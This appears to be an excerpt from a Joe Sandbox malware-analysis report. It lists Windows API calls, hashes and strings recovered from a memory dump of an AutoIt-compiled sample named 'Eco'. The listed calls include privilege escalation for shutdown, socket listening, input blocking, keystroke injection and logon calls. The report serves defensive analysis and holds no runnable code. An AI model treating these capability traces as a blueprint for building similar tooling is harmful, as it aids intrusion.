                          • GetLengthSid.ADVAPI32(?), ref: 00568759
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00568796
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005687B2
                          • GetLengthSid.ADVAPI32(?), ref: 005687CF
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005687DE
                          • HeapAlloc.KERNEL32(00000000), ref: 005687E5
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00568806
                          • CopySid.ADVAPI32(00000000), ref: 0056880D
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0056883E
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00568864
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00568878
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 3996160137-0
                          • Opcode ID: ea01dede8fbd5d3fd877cfad86af1f6d80dc3c5e213e0a443e0062538d8af699
                          • Instruction ID: 5cc6675649ce18480670f117e7bf19aea9613f1c83e479e9d79b2a2279d72f3e
                          • Opcode Fuzzy Hash: ea01dede8fbd5d3fd877cfad86af1f6d80dc3c5e213e0a443e0062538d8af699
                          • Instruction Fuzzy Hash: 136158B190020AAFDF54DFA4DC48EFEBB79FF45304F448629E915A7290DB319A04DB60
                          APIs
                            • Part of subcall function 00591242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005901D5,?,?), ref: 00591259
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005908D4
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00590973
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00590A0B
                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00590C4A
                          • RegCloseKey.ADVAPI32(00000000), ref: 00590C57
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                          • String ID:
                          • API String ID: 1240663315-0
                          • Opcode ID: a43295efaeb35fd82448ffd0340fe323a1c52981bebe24331f72ef2c646479ba
                          • Instruction ID: a6d646a260e3e18a1dbcb2ae19362be41fa1ab061c3b3adee77e5efd05e89fa1
                          • Opcode Fuzzy Hash: a43295efaeb35fd82448ffd0340fe323a1c52981bebe24331f72ef2c646479ba
                          • Instruction Fuzzy Hash: 3DE17D71204211AFCB14DF28D895E2BBBE9FF89314F04996DF44AD72A1DA30ED01CB91
                          APIs
                          • __swprintf.LIBCMT ref: 005742BE
                          • __swprintf.LIBCMT ref: 005742CB
                            • Part of subcall function 005337FA: __woutput_l.LIBCMT ref: 00533853
                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 005742F5
                          • LoadResource.KERNEL32(?,00000000), ref: 00574301
                          • LockResource.KERNEL32(00000000), ref: 0057430E
                          • FindResourceW.KERNEL32(?,?,00000003), ref: 0057432E
                          • LoadResource.KERNEL32(?,00000000), ref: 00574340
                          • SizeofResource.KERNEL32(?,00000000), ref: 0057434F
                          • LockResource.KERNEL32(?), ref: 0057435B
                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 005743BC
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                          • String ID:
                          • API String ID: 1433390588-0
                          • Opcode ID: f79a4e5c1267a152cd30da8f0b83fbf3901ebdb5b05e368a3ed516b0aea19cba
                          • Instruction ID: baba1e1884f8d4fc16bf298073bc6ead3c8b5a7db921ddd4ba0fd6d496870cf9
                          • Opcode Fuzzy Hash: f79a4e5c1267a152cd30da8f0b83fbf3901ebdb5b05e368a3ed516b0aea19cba
                          • Instruction Fuzzy Hash: E331607560521AABDB119F60ED88ABB7FACFF09301F008816F90AD6191E730D955EEB1
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:
                          • API String ID: 1737998785-0
                          • Opcode ID: 456c64be65acef22c9c49a6629e76c2476fdd31480cf9d51c7c1944c516d8111
                          • Instruction ID: a419fbc5a4f6ef550d0d6fd5414e0251ab506f06f1871daa203eb5cb4583ad28
                          • Opcode Fuzzy Hash: 456c64be65acef22c9c49a6629e76c2476fdd31480cf9d51c7c1944c516d8111
                          • Instruction Fuzzy Hash: 9721E5352012129FDB11AF11EC0DB6D7FA8FF96724F008019FC069B2A1DB70AC019F94
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0057F8F0
                          • FindClose.KERNEL32(00000000), ref: 0057FA03
                            • Part of subcall function 005152B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005152E6
                          • Sleep.KERNEL32(0000000A), ref: 0057F920
                          • _wcscmp.LIBCMT ref: 0057F934
                          • _wcscmp.LIBCMT ref: 0057F94F
                          • FindNextFileW.KERNEL32(?,?), ref: 0057F9ED
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                          • String ID: *.*
                          • API String ID: 2185952417-438819550
                          APIs
                            • Part of subcall function 0056917C: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005691C6
                            • Part of subcall function 0056917C: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005691F3
                            • Part of subcall function 0056917C: GetLastError.KERNEL32 ref: 00569200
                          • ExitWindowsEx.USER32(?,00000000), ref: 00575621
                          Similarity
                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                          • String ID: $@$SeShutdownPrivilege
                          • API String ID: 2234035333-194228
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 0058678C
                          • WSAGetLastError.WSOCK32(00000000), ref: 0058679B
                          • bind.WSOCK32(00000000,?,00000010), ref: 005867B7
                          • listen.WSOCK32(00000000,00000005), ref: 005867C6
                          • WSAGetLastError.WSOCK32(00000000), ref: 005867E0
                          • closesocket.WSOCK32(00000000,00000000), ref: 005867F4
                          Similarity
                          • API ID: ErrorLast$bindclosesocketlistensocket
                          • String ID:
                          • API String ID: 1279440585-0
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00511DD6
                          • GetSysColor.USER32(0000000F), ref: 00511E2A
                          • SetBkColor.GDI32(?,00000000), ref: 00511E3D
                            • Part of subcall function 0051166C: DefDlgProcW.USER32(?,00000020,?), ref: 005116B4
                          Similarity
                          • API ID: ColorProc$LongWindow
                          • String ID:
                          • API String ID: 3744519093-0
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 0057C196
                          • _wcscmp.LIBCMT ref: 0057C1C6
                          • _wcscmp.LIBCMT ref: 0057C1DB
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0057C1EC
                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0057C21C
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstNext
                          • String ID:
                          • API String ID: 2387731787-0
                          APIs
                            • Part of subcall function 0058823D: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00588268
                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00586C4E
                          • WSAGetLastError.WSOCK32(00000000), ref: 00586C77
                          • bind.WSOCK32(00000000,?,00000010), ref: 00586CB0
                          • WSAGetLastError.WSOCK32(00000000), ref: 00586CBD
                          • closesocket.WSOCK32(00000000,00000000), ref: 00586CD1
                          Similarity
                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                          • String ID:
                          • API String ID: 99427753-0
                          APIs
                          Similarity
                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                          • String ID:
                          • API String ID: 292994002-0
                          APIs
                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00582891
                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 005828C8
                          Similarity
                          • API ID: Internet$AvailableDataFileQueryRead
                          • String ID:
                          • API String ID: 599397726-0
                          APIs
                            • Part of subcall function 00530F16: std::exception::exception.LIBCMT ref: 00530F4C
                            • Part of subcall function 00530F16: __CxxThrowException@8.LIBCMT ref: 00530F61
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005691C6
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005691F3
                          • GetLastError.KERNEL32 ref: 00569200
                          Similarity
                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                          • String ID:
                          • API String ID: 1922334811-0
                          APIs
                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005740DE
                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0057411F
                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0057412A
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle
                          • String ID:
                          • API String ID: 33631002-0
                          APIs
                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00574DB2
                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00574DC9
                          • FreeSid.ADVAPI32(?), ref: 00574DD9
                          Similarity
                          • API ID: AllocateCheckFreeInitializeMembershipToken
                          • String ID:
                          • API String ID: 3429775523-0
                          APIs
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0057196D
                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00571980
                          Similarity
                          • API ID: InputSendkeybd_event
                          • String ID:
                          • API String ID: 3536248340-0
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,0058991A,?,005A098C,?), ref: 0057A547
                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,0058991A,?,005A098C,?), ref: 0057A559
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          APIs
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00568D0A), ref: 00568BE1
                          • CloseHandle.KERNEL32(?,?,00568D0A), ref: 00568BF3
                          Similarity
                          • API ID: AdjustCloseHandlePrivilegesToken
                          • String ID:
                          • API String ID: 81990902-0
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00538EB7,?,?,?,00000001), ref: 0053A2BA
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0053A2C3
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          APIs
                          • BlockInput.USER32(00000001), ref: 005843D4
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          APIs
                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00575072
                          Similarity
                          • API ID: mouse_event
                          • String ID:
                          • API String ID: 2434400541-0
                          • Opcode ID: 4e9c048fc0e67a633652105619400c69a894576a625ca2590fc6e5ee5ed6119d
                          • Instruction ID: aa900d91aacb38466093f61ffc7a871cbe8349d19c6b83a42350e828cb7e99c6
                          • Opcode Fuzzy Hash: 4e9c048fc0e67a633652105619400c69a894576a625ca2590fc6e5ee5ed6119d
                          • Instruction Fuzzy Hash: B5D05EA0160B05B8FC281B21BC1FF761B08F3517C1F88C549710ACA0C1FCC0684CB470
                          APIs
                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00568D8A), ref: 0056916C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LogonUser
                          • String ID:
                          • API String ID: 1244722697-0
                          • Opcode ID: 4b6f3a062dce57443aba8028b2365d32bbbea68a8aa13f3c1cf38c81b19b9540
                          • Instruction ID: 1e383b6dd9f94d3105d9021ff0fb5bba74ed22417ea444535737a5da9b24b108
                          • Opcode Fuzzy Hash: 4b6f3a062dce57443aba8028b2365d32bbbea68a8aa13f3c1cf38c81b19b9540
                          • Instruction Fuzzy Hash: 10D05E322A050EABEF018EA4DC05EAE3B69EB04B01F808111FE15C50A0C775E835AB60
                          APIs
                          • GetUserNameW.ADVAPI32(?,?), ref: 00550664
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: 783c353837b004930bbfed6862e98ded46af42b1f86cad700ac550f588bfbf81
                          • Instruction ID: e409d80eb8246f426596a30696696e9c6b5d0c53dd1c6bd6eb9ad28ad0995411
                          • Opcode Fuzzy Hash: 783c353837b004930bbfed6862e98ded46af42b1f86cad700ac550f588bfbf81
                          • Instruction Fuzzy Hash: 98C04CF1810519DBCB05DB90D98CDFE77BCBB05308F100456A101F2140D7749B489B71
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0053A28A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 562cb6d914b914e197e0482dd089c50fc3edda9a039f02feaa69da2f7624f206
                          • Instruction ID: 9586ae2843f6e5dcfa8b43e780edaa2ffe0491223b175c712bc3c9715dc840b5
                          • Opcode Fuzzy Hash: 562cb6d914b914e197e0482dd089c50fc3edda9a039f02feaa69da2f7624f206
                          • Instruction Fuzzy Hash: BFA0223003020CFBCF002F82FC08888BFACEB023E0B008022F80C00032CB33A820AAC0
                          APIs
                          • CharUpperBuffW.USER32(?,?,005A0980), ref: 00593A2D
                          • IsWindowVisible.USER32(?), ref: 00593A51
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharUpperVisibleWindow
                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                          • API String ID: 4105515805-45149045
                          • Opcode ID: 8a5c0f89d6012e303cebdb9747d64eb18a7dd7dd97bdcde144e692f865b6ee92
                          • Instruction ID: c506939c9b99427ee6ddc5663d8e2548aee0034844f022d97f47540bbc55a4fb
                          • Opcode Fuzzy Hash: 8a5c0f89d6012e303cebdb9747d64eb18a7dd7dd97bdcde144e692f865b6ee92
                          • Instruction Fuzzy Hash: B7D15E34204306DBCF14EF50C469E6ABFA9BFD4344F545958B8965B2E2CB31DE4ACB82
                          APIs
                          • SetTextColor.GDI32(?,00000000), ref: 0059AA1D
                          • GetSysColorBrush.USER32(0000000F), ref: 0059AA4E
                          • GetSysColor.USER32(0000000F), ref: 0059AA5A
                          • SetBkColor.GDI32(?,000000FF), ref: 0059AA74
                          • SelectObject.GDI32(?,00000000), ref: 0059AA83
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0059AAAE
                          • GetSysColor.USER32(00000010), ref: 0059AAB6
                          • CreateSolidBrush.GDI32(00000000), ref: 0059AABD
                          • FrameRect.USER32(?,?,00000000), ref: 0059AACC
                          • DeleteObject.GDI32(00000000), ref: 0059AAD3
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0059AB1E
                          • FillRect.USER32(?,?,00000000), ref: 0059AB50
                          • GetWindowLongW.USER32(?,000000F0), ref: 0059AB7B
                            • Part of subcall function 0059ACB7: GetSysColor.USER32(00000012), ref: 0059ACF0
                            • Part of subcall function 0059ACB7: SetTextColor.GDI32(?,?), ref: 0059ACF4
                            • Part of subcall function 0059ACB7: GetSysColorBrush.USER32(0000000F), ref: 0059AD0A
                            • Part of subcall function 0059ACB7: GetSysColor.USER32(0000000F), ref: 0059AD15
                            • Part of subcall function 0059ACB7: GetSysColor.USER32(00000011), ref: 0059AD32
                            • Part of subcall function 0059ACB7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0059AD40
                            • Part of subcall function 0059ACB7: SelectObject.GDI32(?,00000000), ref: 0059AD51
                            • Part of subcall function 0059ACB7: SetBkColor.GDI32(?,00000000), ref: 0059AD5A
                            • Part of subcall function 0059ACB7: SelectObject.GDI32(?,?), ref: 0059AD67
                            • Part of subcall function 0059ACB7: InflateRect.USER32(?,000000FF,000000FF), ref: 0059AD86
                            • Part of subcall function 0059ACB7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0059AD9D
                            • Part of subcall function 0059ACB7: GetWindowLongW.USER32(00000000,000000F0), ref: 0059ADB2
                            • Part of subcall function 0059ACB7: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0059ADDA
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                          • String ID:
                          • API String ID: 3521893082-0
                          • Opcode ID: 268c3d33db24594044ed4a3ea758872a9e1d343ea3429af0ae34dd0a94b99533
                          • Instruction ID: f3dd2184e1ab8d2b8e71e990def320d5994b5bbec71cf626b8415b7045c4516a
                          • Opcode Fuzzy Hash: 268c3d33db24594044ed4a3ea758872a9e1d343ea3429af0ae34dd0a94b99533
                          • Instruction Fuzzy Hash: 6291AF72418301AFCB519F64DC08E6B7BA9FF9A320F105A19F962961E0D731D948DF92
                          APIs
                          • DestroyWindow.USER32(?,?,?), ref: 00513072
                          • DeleteObject.GDI32(00000000), ref: 005130B8
                          • DeleteObject.GDI32(00000000), ref: 005130C3
                          • DestroyIcon.USER32(00000000,?,?,?), ref: 005130CE
                          • DestroyWindow.USER32(00000000,?,?,?), ref: 005130D9
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0054C6AC
                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0054C6E5
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0054CB0E
                            • Part of subcall function 00511F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00512412,?,00000000,?,?,?,?,00511AA7,00000000,?), ref: 00511F76
                          • SendMessageW.USER32(?,00001053), ref: 0054CB4B
                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0054CB62
                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0054CB78
                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0054CB83
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                          • String ID: 0
                          • API String ID: 464785882-4108050209
                          • Opcode ID: 3eb591de292820d76951088ad40802cf73ec0a6d3a99c72ff35aca82c128b806
                          • Instruction ID: f0e99ae88a43e9bbcc86bc319686ba82b92f085d55b986819f1a2c94969a7507
                          • Opcode Fuzzy Hash: 3eb591de292820d76951088ad40802cf73ec0a6d3a99c72ff35aca82c128b806
                          • Instruction Fuzzy Hash: 2C12AB30601201EFDB64DF24C898BE9BFE1FF89308F544569E595CB2A2C731E986DB91
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                          • API String ID: 2660009612-1645009161
                          • Opcode ID: a2a4474161b1c1df3eb241aa0513090f1f91eab13546eea8f50e49c64f4b5a43
                          • Instruction ID: da6692a7beff8dfa340c6995e81bd81c5a86620271a116af2ca1cea86b16db01
                          • Opcode Fuzzy Hash: a2a4474161b1c1df3eb241aa0513090f1f91eab13546eea8f50e49c64f4b5a43
                          • Instruction Fuzzy Hash: D1A19F35A0021ABBCB14AF60EC56EAE7FB5BF86700F004429F905AB2D2EB70DE45D751
                          APIs
                          • DestroyWindow.USER32(00000000), ref: 0058798D
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00587A4C
                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00587A8A
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00587A9C
                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00587AE2
